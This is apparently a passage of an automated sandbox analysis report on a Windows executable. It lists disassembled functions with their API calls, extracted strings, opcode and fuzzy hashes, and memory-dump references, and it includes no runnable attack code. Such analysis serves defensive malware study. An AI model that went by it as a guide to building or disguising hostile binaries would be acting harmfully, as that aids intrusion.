Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_free
String ID: 4hU@[Y]W
API String ID: 2283115069-1563900851
Opcode ID: e886084455864fedb8fa5cbe4c8a0f35e0d3b136fe98716dbf111c2e42f92fdb
Instruction ID: e0fda4b75765366fbe778d660d1d4eaa6b5bad5d792d2ad2a567b697175a8444
Opcode Fuzzy Hash: e886084455864fedb8fa5cbe4c8a0f35e0d3b136fe98716dbf111c2e42f92fdb
Instruction Fuzzy Hash: 9E11E97622C2012BC7126A746CC9D9B25F99BE1374B250774FA34C21E1DF618CE29920

Uniqueness

Uniqueness Score: -1.00%

Function 001E6B76, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 67COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001E6B7B

Strings

m_object != nullptr, xrefs: 001E6B98
m_it.array_iterator != m_object->m_value.array->end(), xrefs: 001E6BCD
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 001E6B87, 001E6B97, 001E6BCC, 001E6BF0
m_it.object_iterator != m_object->m_value.object->end(), xrefs: 001E6BF1

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$m_it.array_iterator != m_object->m_value.array->end()$m_it.object_iterator != m_object->m_value.object->end()$m_object != nullptr
API String ID: 3519838083-3557933457
Opcode ID: 7bde36d4abafabb4e511096a824a24a38f1292f1c4ecb8a0e511710dc43bf764
Instruction ID: fafdb3d44e74ed2c822f067a22b08fa9bac1ea478885dd4cad54944367fb5bed
Opcode Fuzzy Hash: 7bde36d4abafabb4e511096a824a24a38f1292f1c4ecb8a0e511710dc43bf764
Instruction Fuzzy Hash: 96212470660640DFC728EB9AC886EAEB7F5EF52710F64402DE486A7682D771ED50CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00206C43, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00206C38,?,?,00206C00,?,?,?), ref: 00206C58
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00206C6B
FreeLibrary.KERNEL32(00000000,?,?,00206C38,?,?,00206C00,?,?,?), ref: 00206C8E

Strings

mscoree.dll, xrefs: 00206C51
CorExitProcess, xrefs: 00206C63

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 1de21bdc48547d36f45880e3b2bacc63ef3288e23e86552b4e3a09e7b6a61671
Instruction ID: 34152ede0c85ebb75632ae04a5ff5f3d709f00d11c82518178e7207a1b0ce0b9
Opcode Fuzzy Hash: 1de21bdc48547d36f45880e3b2bacc63ef3288e23e86552b4e3a09e7b6a61671
Instruction Fuzzy Hash: 60F08C30520219FBEB21AF90EE0DB9EBAB8EB00756F100160B805A11A0CB748E21DA90

Uniqueness

Uniqueness Score: -1.00%

Function 0021F2E6, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0021F368
_free.LIBCMT ref: 0021F38C
_free.LIBCMT ref: 0021F519
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,002321C0), ref: 0021F52B
_free.LIBCMT ref: 0021F6E5

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: a8b8416f5a5e3984ba464766fbadbd3cefcc6bd2916f4e5160da53c4025daa12
Instruction ID: cafb8ea814ebe5d14e502f5be405b82205359147ada893f0f5d0cb00dfdca551
Opcode Fuzzy Hash: a8b8416f5a5e3984ba464766fbadbd3cefcc6bd2916f4e5160da53c4025daa12
Instruction Fuzzy Hash: 9EC1AD36920246AFCB609F78DE41AEA7BF9EF66310F240079E574D7252E7308DA1CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0021590A, Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 0021918E: RtlAllocateHeap.NTDLL(00000000,00000000,7FFFFFFF,?,002001D2,00000000,?,001D4650,00000000,?,4hU@[Y]W,?,?,4hU@[Y]W,4hU@[Y]W), ref: 002191C0

_free.LIBCMT ref: 00215A19
_free.LIBCMT ref: 00215A30
_free.LIBCMT ref: 00215A4D
_free.LIBCMT ref: 00215A68
_free.LIBCMT ref: 00215A7F

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 660d40fd72c8ec17f6216b0164d0fac94fec8126b10afc65b099457ed35b40a2
Instruction ID: 4d7505947d7ac6076909b742103db8566041cd5c700f3000a30e32c8ac1690b9
Opcode Fuzzy Hash: 660d40fd72c8ec17f6216b0164d0fac94fec8126b10afc65b099457ed35b40a2
Instruction Fuzzy Hash: 53510971A20B15EFDB20DF65C881BEA77F4EFA4724F1406A9E809D7250E730D9A1CB80

Uniqueness

Uniqueness Score: -1.00%

Function 001FDE51, Relevance: 7.6, APIs: 5, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,00000000), ref: 001FDE99
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 001FDECA
GetLocalTime.KERNEL32(?), ref: 001FDEF9
SystemTimeToFileTime.KERNEL32(?,?), ref: 001FDF07
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001FDF39

Part of subcall function 001FD9B8: GetFileInformationByHandle.KERNEL32(?,?,?,?,00000000), ref: 001FD9CC

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 89576305-0
Opcode ID: ab59a0fe854c61cc6f963ba9b6c2e50c57fbd33b768a4dca06ef8164e505d26a
Instruction ID: 28951ffe0fc3e05acb833265fa74fd657e613b7d7000c0f29dc308882d76b70f
Opcode Fuzzy Hash: ab59a0fe854c61cc6f963ba9b6c2e50c57fbd33b768a4dca06ef8164e505d26a
Instruction Fuzzy Hash: 133150B1500B09AFD725CF79D885ABBBBE9FB44304F10492EE697C2650E770E945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 002211C9, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002211E1

Part of subcall function 00217FE3: RtlFreeHeap.NTDLL(00000000,00000000,?,0022146B,?,00000000,?,4hU@[Y]W,?,0022170E,?,00000007,?,?,00221B0F,?), ref: 00217FF9
Part of subcall function 00217FE3: GetLastError.KERNEL32(?,?,0022146B,?,00000000,?,4hU@[Y]W,?,0022170E,?,00000007,?,?,00221B0F,?,?), ref: 0021800B

_free.LIBCMT ref: 002211F3
_free.LIBCMT ref: 00221205
_free.LIBCMT ref: 00221217
_free.LIBCMT ref: 00221229

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ce014708660e511b981b7a9ef0eaea4eeaf8841fcc61d129cc249180cebe969e
Instruction ID: 6b6eca68d270acf3756691cac9ee3d06c9c9b3a118985c8660912bbcec7b8e10
Opcode Fuzzy Hash: ce014708660e511b981b7a9ef0eaea4eeaf8841fcc61d129cc249180cebe969e
Instruction Fuzzy Hash: BEF0123652C621B78724EFA4F489C5A77EAEE617107750905F46CD7911CF30FDB14A90

Uniqueness

Uniqueness Score: -1.00%

Function 001DAA19, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 364COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001DAA1E

Part of subcall function 001D2F2D: _Deallocate.LIBCONCRT ref: 001D2F3C

Part of subcall function 001D2D4F: _Deallocate.LIBCONCRT ref: 001D2D64

Part of subcall function 001F57CC: __EH_prolog.LIBCMT ref: 001F57D1

Part of subcall function 001D5505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,001DA94A,?,?,00000000), ref: 001D551B
Part of subcall function 001D5505: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 001D5541
Part of subcall function 001D5505: CommitTransaction.KTMW32(00000000,?,001DA94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 001D554C

Strings

!}lXlNODSN, xrefs: 001DAA5E
'{j^jHIBUH{, xrefs: 001DAB47
,!, xrefs: 001DAC67

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeallocateH_prologTransaction$CommitCopyCreateFileTransacted
String ID: !}lXlNODSN$'{j^jHIBUH{$,!
API String ID: 86610801-4150241439
Opcode ID: 71cf5e975219544712c3442ddcd0575a7c0cfaec8c03ffdd43d6e7814e5d0c65
Instruction ID: 102a190cd30026b9f3c13f69b4968ad9fd5ba33f13e905e544341c31160623af
Opcode Fuzzy Hash: 71cf5e975219544712c3442ddcd0575a7c0cfaec8c03ffdd43d6e7814e5d0c65
Instruction Fuzzy Hash: F3F14870D01299DBCF15EFA4C891AEDFBB1AF29300F6481AEE425B7242DB345A49CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001DA4CA, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 363COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001DA4CF

Part of subcall function 001D2F2D: _Deallocate.LIBCONCRT ref: 001D2F3C

Part of subcall function 001D2D4F: _Deallocate.LIBCONCRT ref: 001D2D64

Part of subcall function 001F57CC: __EH_prolog.LIBCMT ref: 001F57D1

Part of subcall function 001D5505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,001DA94A,?,?,00000000), ref: 001D551B
Part of subcall function 001D5505: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 001D5541
Part of subcall function 001D5505: CommitTransaction.KTMW32(00000000,?,001DA94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 001D554C

Strings

>, xrefs: 001DA5E1
nc, xrefs: 001DA711
4hU@[Y]W, xrefs: 001DA509

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeallocateH_prologTransaction$CommitCopyCreateFileTransacted
String ID: 4hU@[Y]W$>$nc
API String ID: 86610801-2892674260
Opcode ID: ecec94f3bf05530274b099b3a0fce76fc67f33e96f8bfab6b5d36f266ffb446d
Instruction ID: 31a6c7549eb250d3423e36cb07ae71c929974e45bdab50f337e45538d4804f19
Opcode Fuzzy Hash: ecec94f3bf05530274b099b3a0fce76fc67f33e96f8bfab6b5d36f266ffb446d
Instruction Fuzzy Hash: 1AF15870D01299DBCF15EBA4C891AEDFBB1AF29300F6481AEE425B7342DB345A49CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001DA10D, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 152COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001DA112

Part of subcall function 001D2D4F: _Deallocate.LIBCONCRT ref: 001D2D64

Strings

dm|{, xrefs: 001DA224
TBip, xrefs: 001DA22D
p, xrefs: 001DA234

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID: TBip$dm|{$p
API String ID: 3708980276-1957332360
Opcode ID: 906bb3d038a6fe715add7c1f8ee422b6c94038ebc56669ec783469052977d6e9
Instruction ID: 2d6b5dc4f99143c8e390348afeea1c781efe635de3f94f42c94f9fdc4208a2be
Opcode Fuzzy Hash: 906bb3d038a6fe715add7c1f8ee422b6c94038ebc56669ec783469052977d6e9
Instruction Fuzzy Hash: 85519D71D053488ACF05EFE8D592AEEFBB1AF79300F64851EE4117B282DB705A0ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 00212622, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142COMMON

Download Yara Rule

APIs

Part of subcall function 002171CB: GetLastError.KERNEL32(?,?,00000000,00212010,?,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C), ref: 002171D0
Part of subcall function 002171CB: SetLastError.KERNEL32(00000000,00000007,000000FF,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C,?), ref: 0021726E

_free.LIBCMT ref: 002126D1
_free.LIBCMT ref: 002126FF
_free.LIBCMT ref: 00212747

Strings

W(!, xrefs: 00212658, 002126A2, 002126DE, 0021265B, 002126A5

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: W(!
API String ID: 3291180501-2273730515
Opcode ID: 5b95e440907746ab34bcc0e568561dc24c8f338cc4692a4b425e9705f34f0f59
Instruction ID: 7ba608015311645c8378bb093a2b3528205c34d86855664bd694f0a4ec1c32ff
Opcode Fuzzy Hash: 5b95e440907746ab34bcc0e568561dc24c8f338cc4692a4b425e9705f34f0f59
Instruction Fuzzy Hash: 34418A31614206EFD724CFACC885AAAB3E9EF59314B24066DF415C7291EB31ECB59F80

Uniqueness

Uniqueness Score: -1.00%

Function 00217477, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 00220A2E: EnterCriticalSection.KERNEL32(0020657E,?,00217D73,0020657E,00245010,00000010,00205098,00000000,8304488B,001FFBCC,001FFBCC,?,?,0020657E,00000000,001FFBCC), ref: 00220A49

FlushFileBuffers.KERNEL32(00000000,00244FF0,0000000C,0021757E,dQ ,00000000,00000000,00000000,00205164,00000000,00000000), ref: 002174C0
GetLastError.KERNEL32 ref: 002174D1

Strings

dQ , xrefs: 002174F8
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 002174B8

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: BuffersCriticalEnterErrorFileFlushLastSection
String ID: A:\_Work\rc-build-v1-exe\json.hpp$dQ
API String ID: 4109680722-4020703403
Opcode ID: 3a39ba9358f738f413a1009b5bfcea9887984d7d6608151ad8e4aa6d097cb633
Instruction ID: 0df2db747df5e2f855893e1208b2aef6bd79862e010a8dab10362dd692677c0d
Opcode Fuzzy Hash: 3a39ba9358f738f413a1009b5bfcea9887984d7d6608151ad8e4aa6d097cb633
Instruction Fuzzy Hash: DA01C076A203149FC721EFA8E80969D7BF0EF59720F10421AF9119B3E2DB74D8528F40

Uniqueness

Uniqueness Score: -1.00%

Function 001C95E7, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C95EC
std::_Lockit::_Lockit.LIBCPMT ref: 001C95FC
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001C9639

Part of subcall function 001FF8E5: _Yarn.LIBCPMT ref: 001FF904
Part of subcall function 001FF8E5: _Yarn.LIBCPMT ref: 001FF928

Strings

bad locale name, xrefs: 001C9652

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Yarnstd::_$H_prologLocinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 2550485109-1405518554
Opcode ID: 0e6cafa3aa7ebb1ca3ff7ce79003c13088455584fa58ca427739b058f767c587
Instruction ID: 3302f9c9f668b2251809bec06f4ce4ffc04c6afe1e5363088255d701fa17bc3c
Opcode Fuzzy Hash: 0e6cafa3aa7ebb1ca3ff7ce79003c13088455584fa58ca427739b058f767c587
Instruction Fuzzy Hash: 58017171915B94DEC321DFAA848055AFBE0BF29710B50897FE18ED3A41C770A504CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0021B66B, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0021B6F2

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 086afaf91fea0d09aa532613d50885aa680859e96e28912ace5bcc05a77f9cbd
Instruction ID: 2a853da90b6684b75a252a598017166da749adaa470966564a915e72fb87fd70
Opcode Fuzzy Hash: 086afaf91fea0d09aa532613d50885aa680859e96e28912ace5bcc05a77f9cbd
Instruction Fuzzy Hash: 2CB13832D242969FDB12CF68C8817EEBBF9EF65340F1541AAD8549B241D3348DA2CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001FA741, Relevance: 6.2, APIs: 4, Instructions: 160COMMON

Download Yara Rule

APIs

_wmemset.LIBCMT ref: 001FA782
_Deallocate.LIBCONCRT ref: 001FA7A5

Part of subcall function 001C9146: std::exception::exception.LIBCMT ref: 001C915A

_Deallocate.LIBCONCRT ref: 001FA827
__EH_prolog.LIBCMT ref: 001FA850

Part of subcall function 001C95E7: __EH_prolog.LIBCMT ref: 001C95EC
Part of subcall function 001C95E7: std::_Lockit::_Lockit.LIBCPMT ref: 001C95FC
Part of subcall function 001C95E7: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001C9639

Part of subcall function 001FA929: __EH_prolog.LIBCMT ref: 001FA92E

Part of subcall function 001C965D: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 001C967A
Part of subcall function 001C965D: std::_Lockit::~_Lockit.LIBCPMT ref: 001C96EB

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$H_prolog$DeallocateLocinfo::_Lockit$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~__wmemsetstd::exception::exception
String ID:
API String ID: 876519310-0
Opcode ID: dc211d59deb9310d24a678ca163db4428320ed79a43b955cccb94226fa10a6ba
Instruction ID: da8bdde7ff0b310fe23e2e1c40f7677c3ebb4be2d0ced52a9848fec838ae14e9
Opcode Fuzzy Hash: dc211d59deb9310d24a678ca163db4428320ed79a43b955cccb94226fa10a6ba
Instruction Fuzzy Hash: 8E51B3B2500219AFCB04DF98D885DAEBBBDFF58350B50412EF919D7241DB74EA11CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001CB08B, Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

___std_fs_open_handle@16.LIBCPMT ref: 001CB0AF
___std_fs_read_reparse_data_buffer@12.LIBCPMT ref: 001CB0E9

Part of subcall function 001FF3BE: DeviceIoControl.KERNEL32 ref: 001FF3D9
Part of subcall function 001FF3BE: GetLastError.KERNEL32(?,001CB0EE,?,00000000,00004002,?,?,00000080,02200000,?,?), ref: 001FF3E3

___std_fs_get_file_attributes_by_handle@8.LIBCPMT ref: 001CB115

Part of subcall function 001FEC56: CloseHandle.KERNEL32(000000FF,?,001FF31E,?,?,?,00000080,?), ref: 001FEC62

___std_fs_read_name_from_reparse_data_buffer@12.LIBCPMT ref: 001CB150

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseControlDeviceErrorHandleLast___std_fs_get_file_attributes_by_handle@8___std_fs_open_handle@16___std_fs_read_name_from_reparse_data_buffer@12___std_fs_read_reparse_data_buffer@12
String ID:
API String ID: 719998554-0
Opcode ID: 0aea0e133ddf5d3e07d7728b7282eb866ff28d0ec8f7850e5bc65158615e63d5
Instruction ID: 0c6011cb128fc984488017475abd1e9858a7cc481f8b53f80adf3885083cb9aa
Opcode Fuzzy Hash: 0aea0e133ddf5d3e07d7728b7282eb866ff28d0ec8f7850e5bc65158615e63d5
Instruction Fuzzy Hash: 2631F431D08219BBEB11ABA4AC93EBEB7B9AF50700F140069F610F7151DB70DE118BD0

Uniqueness

Uniqueness Score: -1.00%

